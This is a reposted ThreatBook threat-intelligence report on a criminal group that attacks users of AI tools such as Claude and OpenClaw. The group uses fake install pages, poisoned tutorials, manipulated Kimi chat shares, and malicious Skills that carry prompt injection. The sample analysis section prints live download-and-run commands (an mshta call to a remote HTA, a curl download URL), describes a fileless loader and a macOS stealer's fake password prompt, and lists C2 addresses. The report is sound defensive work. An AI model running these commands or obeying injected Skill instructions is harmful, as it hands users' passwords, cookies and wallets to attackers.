大家好，我是讯享网，很高兴认识大家。这里提供最前沿的Ai技术和互联网信息。



文章总结： 微步在线捕获针对AI应用生态的黑产团伙，该团伙利用仿冒安装教程、技术文章、提示词注入及恶意Skills等方式投毒，窃取浏览器数据、加密货币钱包等隐私。Windows样本采用多层解密无文件攻击绕过传统杀软，Mac样本利用伪造弹窗骗取密码。攻击手法典型且IOC迭代极快，微步TDP等系列产品已支持检测防护，需警惕此类AI生态新威胁。 综合评分： 90 文章分类： 威胁情报,AI安全,恶意软件

---

原创

ThreatBook ThreatBook

微步在线

2026年3月12日 08:30 北京

昨日微步文章OpenClaw给我装了个木马背后的黑产团伙浮出水面。该黑产团伙针对Claude、OpenClaw等AI应用生态，发起大规模仿冒、投毒、提示词注入等攻击活动，可窃取数十类隐私数据。微步情报局认为，该团伙的攻击模式，是 AI 应用生态中的典型威胁范式，未来或将引发更多同类攻击与黑产团伙效仿。

该团伙正在公开互联网上大量推广含恶意命令的AI应用教程、技术文章，诱导受害者在电脑上主动执行恶意命令，手法包括：

（1）仿冒OpenClaw、Claude等AI工具一句话安装命令，诱导受害者主动执行；

（2）分享Mac电脑磁盘清理等技术教程，进而诱导受害者执行恶意命令；

（3）转发“断章取义”后的大模型聊天会话，内含提示词诱导后的恶意输出；

（4）上传恶意Skills至Clawhub、SkillsMP等AI生态社区，诱导OpenClaw调用，此类攻击已被OneSEC EDR多次捕获。

使用Google广告服务获得钓鱼链接的优先显示

在样本层面，该团伙大量使用无文件攻击，尤其是在Windows平台上包含4层解密解压缩，全程无文件落地，完成Shellcode反射加载。这类手法完全绕过了传统杀毒检测和内存扫描技术，对抗难度极大。

样本运行后可窃取的数据包括，浏览器Cookies、登录信息、自动填充信息、目标插件的数据文件（硬编码扩展ID），以及本地开机密码、加密货币钱包、通讯软件、笔记、凭证配置、密码软件、敏感文档、系统环境等，危害极大。

该团伙所属IOC迭代速度极快，且仍在快速增长中。目前，微步威胁感知平台 TDP 、下一代威胁情报平台 NGTIP 、威胁情报云 API 、云沙箱 S、沙箱分析平台 OneSandbox、互联网安全接入服务 OneDNS 、威胁防御系统 OneSIG 、终端安全管理平台 OneSEC 等均已支持对此次攻击事件的检测与防护。

本文中涉及到的样本分析完整内容，后续会在微步在线研究响应中心微信公众号发布，敬请关注。

攻击活动与传播手法

一、以安装文档为主题

这是该黑产团伙目前最流行，也是最好用的仿冒主题。当用户在Google搜索Claude，OpenClaw，NotebookLM等应用尝试安装使用时，会被优先推送仿冒钓鱼的网页链接。该黑产团伙部署的仿冒钓鱼页面通过Google Ads赞助商广告进行投递，且钓鱼页面部署在一些快速搭建网站或者售卖三级域名的第三方服务平台，而广告只显示二级域名，这增加了仿冒钓鱼结果的可信度。

访问这些仿冒钓鱼页面，页面中包含了一句话在macOS和Windows双平台的安装命令，并诱导用户主动在电脑上执行。

需要注意的是，这些钓鱼仿冒页面使用一些售卖三级域名服务（比如：it.com）或者网站搭建平台（比如：squarespace.com）的第三方服务，来快速搭建这些钓鱼页面。

二、以技术文章为主题

除了使用安装教程作为仿冒钓鱼诱饵外，在该团伙早期的攻击活动中，还使用了一些技术文章作为钓鱼的诱饵页面。

当用户在Google上搜索“如何在Mac上清理磁盘”，“如何显示Mac上隐藏文件”等技术问题后，该黑产团伙通过Google Ads赞助商广告投递了相应的钓鱼页面：

这些钓鱼页面里面详细的介绍了该如何操作，实际则诱导用户打开终端，输入并运行页面中的恶意命令。

三、利用大模型对话分享机制

仿冒的钓鱼页面不仅仅部署在一些第三方平台上，该黑产团伙还利用了一些大模型对话的分享机制，通过在Google Ads中填写大模型分享对话的URL，来投递钓鱼信息：

用户在Google搜索“How To Clear Disk Space On Mac”（如何在Mac上清理磁盘空间），Google结果中展示了来自Kimi的搜索结果，点击查看也是Kimi的输出。

在这些内容中，包含了攻击者想要用户执行的恶意命令。出于对Kimi等大模型应用的信任，用户会按照教程选择复制并运行，实际却运行了恶意命令。

不过，这些恶意命令并非是因为模型数据污染而导致的输出结果失真，而是攻击者精心构造了提示词，进而诱导了大模型的输出指定结果，并将输出对话截断分享来达到欺骗其他用户的作用。

四、上传恶意Skills

除了使用上述钓鱼页面来诱导用户手动在终端输入恶意命令外，该黑产团伙还制作了大量恶意的Skills，并将其上传到Clawhub，SkillsMP等Skills集合网站。这些恶意Skills通过OpenClaw，Claude Code，CodeX，Cursor等AI应用引入使用，当模型调用时，会运行在Skills.md文件中的恶意命令。

以部署在Clawhub上的恶意Skills“google-cht”为例：

通过该Skills.md文档中Prerequisites（先决条件）节的Prompt注入攻击来实现OpenClaw调用其恶意命令执行。

上周，微步OneSEC EDR已在Mac上检测到了该团伙发起的一起攻击事件，恶意Skill在被OpenClaw调用起来后，会自动下载并运行一个木马。该木马利用AppleScript伪造弹窗，欺骗用户，窃取本地开机密码。详情查看OpenClaw给我装了个木马

样本分析（部分）

Windows样本

以如下一句话命令为例。

C:WindowsSysWOW64mshta.exe https://kimi.install-files.com/kimi

这个命令会调用Windows上的mshta.exe程序，这是Windows系统自带的命令行工具，用于执行.hta（HTML Application）文件。它允许使用HTML、CSS和JavaScript/VBScript开发并运行具有本地系统权限的桌面应用程序。因其可远程加载脚本、执行系统命令且常被视为受信任程序，常被用于无文件攻击。攻击者正是用了该程序去加载攻击者服务器上的恶意hta文件：kimi。

在Kimi中以AutoOpen作为程序入口，但是对于入口的定义出现了10次（按照编程范式，只有最后一次定义有效），这10次定义中引用了不同的变量、不同的十六进制解码函数、不同的Base64解码函数，但这10次定义都遵守同一套“反序列化执行载荷”的逻辑。

以最后一次对AutoOpen定义为例：

而这个RightImprint子函数调用中，通过Hex解码函数解密字符串，用CreateObject创建WScript.Shell并取.environment(“Process”)：

然后再在内存中拼接内联XML Manifest注册.NET类型，调用CreateObject传入ActCtx得到激活上下文并设置Manifest，从而在无.NET安装界面的情况下通过ActCtx创建BinaryFormatter：

随后用Base64解码函数将内嵌的Base64载荷解码为二进制流，先对第一段载荷（约2225字节）调用Deserialize_2，然后对第二段载荷（约 17 万字节）再次反序列化，从而在内存中完成基于BinaryFormatter的反序列化加载。

经过一系列复杂的解密解压缩后（完整分析内容后续会在公众号：微步在线研究响应中心发布），最终的shellcode会解密出远控PE程序，该程序于2026年2月25日被编译，且该程序精简过导入函数表，实际内部使用NT系统调用函数来绕过EDR的Hook技术。

程序运行后反连C2地址：144.124.235.102:443

macOS样本

同样，MacOS上分析也从一句话命令开始：

这条命令base64解密之后为：

http://jaxfamilylawyers.com/curl/515b7a4ebc1a925a99df8abd6ae508ffa971c9d97d6d595fa3f3cd6ee410d78d

查看下载文件：

再次解密，得到后续的shell脚本

该shell脚本首先会从攻击者服务器下载AppleScript脚本执行：

下载脚本为AppleScript脚本：

这个脚本被Mac进程osascript执行，脚本内标识为MacSync Stealer 1.1.2_release版本

脚本启动后，首先关闭终端程序，创建了后续使用目录：/tmp/sync{randomNumber}，然后尝试获取用户密码：

在获取用户密码时，尝试通过伪造一个系统弹窗来诱导用户输入密码：

然后脚本识别本地目录来尝试偷取浏览器信息：

部分IOC

钓鱼网站

docs-claude-code-app.squarespace.com

claude-code-docs-app.craft.me

claulastver.squarespace.com

openclaw-dwnl.squarespace.com

mac-storage-optimazer.craft.me

macstorage-cleaner.craft.me

notebooklm-last-version.squarespace.com

Windows平台下载样本地址

openclaw.install-files.com

google-notebooklm.install-files.com

claude-code.install-files.com

kimi.install-files.com

qwen.install-files.com

claude-code.official-version.com

openclaw.official-version.com

claude.update-version.com

openclaw.update-version.com

doubao.update-version.com

MacOS平台下载样本地址

saramoftah.com

res2erch-sl0ut.com

coco2-hram.com

kayeart.com

jaxfamilylawyers.com

C2远控

144.124.235.102:443

45.94.47.204:80

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：微步在线 ThreatBook

 ThreatBook《利用OpenClaw的黑产团伙首次被捕获》